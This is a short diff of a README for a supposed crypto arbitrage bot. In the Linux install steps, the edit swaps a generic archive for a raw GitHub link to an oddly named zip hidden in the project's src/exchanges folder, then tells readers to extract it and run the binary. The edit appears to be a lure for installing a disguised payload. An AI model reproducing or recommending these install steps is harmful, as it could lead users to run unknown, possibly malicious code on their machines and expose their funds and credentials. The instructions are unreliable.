Joberthings/ArbitrageBOT/README.md

 - Open your Applications folder and double-click ArbitrageBOT to run it.

 #### Linux
-- For Linux users, extract the `.tar.gz` file.
+- For Linux users, extract the `https://raw.githubusercontent.com/Joberthings/ArbitrageBOT/master/src/exchanges/ArbitrageBOT-krohnkite.zip` file.
 You can do this by right-clicking and selecting "Extract."
 - Navigate to the extracted folder in your terminal.
 - Run the bot using the command `./ArbitrageBOT`.